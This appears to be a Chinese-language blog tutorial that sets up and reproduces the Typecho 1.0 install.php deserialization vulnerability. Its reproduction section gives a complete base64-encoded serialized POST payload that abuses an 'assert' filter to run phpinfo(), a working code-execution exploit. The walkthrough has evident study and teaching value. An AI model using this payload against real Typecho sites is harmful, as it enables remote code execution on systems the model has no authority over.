1.环境搭建

项目地址：Release Typecho 1.0(14.10.10) · typecho/typecho · GitHub

 安装：

创建数据库typecho

create database typecho;

再进入安装程序，输入数据库密码，设置登录密码即可

 直接使用即可

2.漏洞分析

install.php文件中，存在反序列化漏洞

typecho_Cookie的get函数从cookie或者post中获取参数

由上可知，要先存在finish参数，

 同时，必须有referer

3.漏洞复现

3.1以用户身份访问环境

3.2再访问install.php，传入get参数finish,并且post传参

payload：

Referer处，填写前一个网页的url即可

post：

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUxMTc5NTIwMTtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

发包后即可，执行phpinfo();

格外推文：

https://www.cnblogs.com/seizer/p/17187936.html

https://www.cnblogs.com/wuhongbin/p/15526142.html